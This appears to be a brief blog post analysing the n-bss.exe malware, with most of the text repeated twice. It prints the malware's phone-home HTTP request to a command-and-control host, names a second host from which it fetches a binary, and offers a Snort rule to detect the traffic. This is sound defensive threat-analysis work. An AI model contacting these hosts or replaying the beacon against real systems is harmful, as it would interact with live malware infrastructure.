n-bss.exe does a GET phone home to gateshis.cn (91.213.174.9) then tries to download another n-bss.exe binary from blogcz.cn (not resolving):
GET /knock.php?id=SYSTEM!WINXP!B857B9C9 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: gateshis.cn
Connection: Keep-Alive
knock.php's id parameter is delimited by "!". "SYSTEM" remained consistent on my packet captures--user name of the process? The next field is the computer's name. I'm not sure about the last field:
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"n-bss.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/knock.php?id="; pcre:"/id=SYSTEM!.*!/"; sid:123120091;)
References:
Virustotal
ThreatExpert
GET /knock.php?id=SYSTEM!WINXP!B857B9C9 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: gateshis.cn
Connection: Keep-Alive
knock.php's id parameter is delimited by "!". "SYSTEM" remained consistent on my packet captures--user name of the process? The next field is the computer's name. I'm not sure about the last field:
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"n-bss.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/knock.php?id="; pcre:"/id=SYSTEM!.*!/"; sid:123120091;)
References:
Virustotal
ThreatExpert
No comments:
Post a Comment